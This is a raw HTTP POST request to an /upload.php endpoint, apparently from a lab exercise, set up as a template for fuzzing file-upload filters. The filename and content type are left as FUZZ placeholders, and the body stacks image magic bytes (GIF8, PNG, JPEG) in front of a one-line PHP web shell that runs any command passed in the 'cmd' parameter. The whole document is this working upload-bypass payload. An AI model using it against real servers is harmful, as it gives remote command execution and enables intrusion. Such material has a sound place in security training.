POST /upload.php HTTP/1.1
Host: 94.237.63.150:41091
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------92045683822079129403023944304
Origin: http://94.237.63.150:41091
Connection: keep-alive
Referer: http://94.237.63.150:41091
Priority: u=0

-----------------------------92045683822079129403023944304
Content-Disposition: form-data; name="uploadFile"; filename="FUZZ"
Content-Type: "CONTENTTYPE"

GIF8
PNG
JPEG
JPG
<?php system($_REQUEST['cmd']);?>


-----------------------------92045683822079129403023944304--
